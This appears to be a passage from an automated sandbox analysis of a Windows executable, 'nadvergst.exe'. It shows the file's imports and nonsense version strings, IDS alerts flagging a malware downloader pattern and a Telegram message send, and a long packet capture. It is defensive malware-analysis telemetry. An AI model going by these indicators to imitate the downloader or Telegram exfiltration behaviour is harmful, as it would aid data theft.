                                                                                                                                                                  ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                                  ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                                                                                  VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                                                                                                                                                  DescriptionData
                                                                                                                                                                  Commentsforskningslederen phon
                                                                                                                                                                  CompanyNameinfluenzaepidemiens doktoren
                                                                                                                                                                  FileVersion2.4.0.0
                                                                                                                                                                  InternalNamenadvergst.exe
                                                                                                                                                                  LegalCopyrightbimahs weensier spildevandsledningernes
                                                                                                                                                                  LegalTrademarksintensiveringernes
                                                                                                                                                                  Translation0x0409 0x04e4
                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                  EnglishUnited States
                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                  2025-02-25T08:27:35.888216+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449770172.217.18.14443TCP
                                                                                                                                                                  2025-02-25T08:27:41.175108+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449812158.101.44.24280TCP
                                                                                                                                                                  2025-02-25T08:27:42.581340+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449812158.101.44.24280TCP
                                                                                                                                                                  2025-02-25T08:27:43.138773+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449828104.21.96.1443TCP
                                                                                                                                                                  2025-02-25T08:27:43.800116+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449830158.101.44.24280TCP
                                                                                                                                                                  2025-02-25T08:27:45.588203+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449848104.21.96.1443TCP
                                                                                                                                                                  2025-02-25T08:27:46.775686+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449855104.21.96.1443TCP
                                                                                                                                                                  2025-02-25T08:27:53.628181+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449905149.154.167.220443TCP
                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Feb 25, 2025 08:27:34.700143099 CET49770443192.168.2.4172.217.18.14
                                                                                                                                                                  Feb 25, 2025 08:27:34.700206995 CET44349770172.217.18.14192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:34.704026937 CET49770443192.168.2.4172.217.18.14
                                                                                                                                                                  Feb 25, 2025 08:27:34.791857958 CET49770443192.168.2.4172.217.18.14
                                                                                                                                                                  Feb 25, 2025 08:27:34.791884899 CET44349770172.217.18.14192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:35.462557077 CET44349770172.217.18.14192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:35.462738037 CET49770443192.168.2.4172.217.18.14
                                                                                                                                                                  Feb 25, 2025 08:27:35.463373899 CET44349770172.217.18.14192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:35.463435888 CET49770443192.168.2.4172.217.18.14
                                                                                                                                                                  Feb 25, 2025 08:27:35.511449099 CET49770443192.168.2.4172.217.18.14
                                                                                                                                                                  Feb 25, 2025 08:27:35.511483908 CET44349770172.217.18.14192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:35.511815071 CET44349770172.217.18.14192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:35.511872053 CET49770443192.168.2.4172.217.18.14
                                                                                                                                                                  Feb 25, 2025 08:27:35.515499115 CET49770443192.168.2.4172.217.18.14
                                                                                                                                                                  Feb 25, 2025 08:27:35.559334040 CET44349770172.217.18.14192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:35.888216019 CET44349770172.217.18.14192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:35.888287067 CET49770443192.168.2.4172.217.18.14
                                                                                                                                                                  Feb 25, 2025 08:27:35.888299942 CET44349770172.217.18.14192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:35.888336897 CET49770443192.168.2.4172.217.18.14
                                                                                                                                                                  Feb 25, 2025 08:27:35.888556004 CET49770443192.168.2.4172.217.18.14
                                                                                                                                                                  Feb 25, 2025 08:27:35.888587952 CET44349770172.217.18.14192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:35.888632059 CET49770443192.168.2.4172.217.18.14
                                                                                                                                                                  Feb 25, 2025 08:27:35.932171106 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:35.932220936 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:35.932405949 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:35.932883978 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:35.932897091 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:36.594932079 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:36.595026016 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:36.599673033 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:36.599705935 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:36.599997044 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:36.600052118 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:36.607388020 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:36.651338100 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.311794043 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.311968088 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.312279940 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.312340975 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.326678038 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.326780081 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.326793909 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.326833010 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.400381088 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.400496960 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.400513887 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.400568962 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.400624037 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.400679111 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.400758028 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.400827885 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.400840044 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.400930882 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.406708002 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.406764984 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.406778097 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.406862020 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.413311958 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.413439035 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.413450956 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.413589954 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.419622898 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.419719934 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.419738054 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.419776917 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.425885916 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.426039934 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.426053047 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.426134109 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.431380987 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.431472063 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.431479931 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.431596041 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.437306881 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.437407970 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.437414885 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.437470913 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.442603111 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.442713976 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.442719936 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.442806959 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.448193073 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.448271990 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.448328972 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.448451996 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.453943014 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.454024076 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.454056978 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.454138994 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.459909916 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.459996939 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.489398003 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.489479065 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.489510059 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.489604950 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.489614010 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.489672899 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.489681005 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.489726067 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.489744902 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.489794016 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.489835024 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.489886999 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.489918947 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.489964962 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.492250919 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.492337942 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.495625973 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.495759010 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.497529984 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.497601032 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.497612000 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.497665882 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.503490925 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.503552914 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.503587008 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.503638983 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.503671885 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.503712893 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.508765936 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.508841991 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.508851051 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.508914948 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.514688015 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.514746904 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.514754057 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.514828920 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.520066977 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.520136118 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.520145893 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.520253897 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.525652885 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.525723934 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.525757074 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.525801897 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.531481028 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.531614065 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.531627893 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.531708956 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.537281036 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.537945986 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.537976027 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.538068056 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.542052984 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.542149067 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.542165041 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.542215109 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.546552896 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.546647072 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.546669960 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.546741962 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.550940990 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.551018953 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.551079988 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.551136017 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.555244923 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.555341959 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.555392027 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.555550098 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.559237957 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.559324026 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.559350967 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.559413910 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.559437037 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.559499979 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.559521914 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.559577942 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.563487053 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.563622952 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.563638926 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.563699007 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.567259073 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.567311049 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.567365885 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.567451954 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.580547094 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.580727100 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.580780983 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.580781937 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.580804110 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.580857038 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.580862999 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.580899954 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.580904961 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.581022024 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.581027031 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.581073046 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.581197023 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.581437111 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.581444979 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.581568956 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.583591938 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.583676100 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.583688974 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.583729029 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.585853100 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.585921049 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.585942984 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.586050034 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.588160992 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.588222980 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.588243961 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.588296890 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.590528965 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.590617895 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.590630054 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.590759993 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.592729092 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.592796087 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.592812061 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.592946053 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.595056057 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.595128059 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.595160007 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.595202923 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.597393036 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.597476006 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.597486019 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.597541094 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.599699974 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.599833965 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.599852085 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.599973917 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.602025032 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.602174997 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.602183104 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.602237940 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.604327917 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.604391098 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.604425907 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.604482889 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.606527090 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.606686115 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.606702089 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.606754065 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.608891010 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.608956099 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.608963966 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.609005928 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.611249924 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.611301899 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.611325979 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.611411095 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.613493919 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.613549948 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.613558054 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.613636017 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.615710020 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.615763903 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.615770102 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.615813017 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.618055105 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.618103981 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.618119955 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.618256092 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.620326042 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.620378971 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.620383978 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.620436907 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.622580051 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.622617006 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.622699022 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.622739077 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.624864101 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.624907017 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.625533104 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.625583887 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.627149105 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.627248049 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.627255917 CET44349781142.250.185.193192.168.2.4
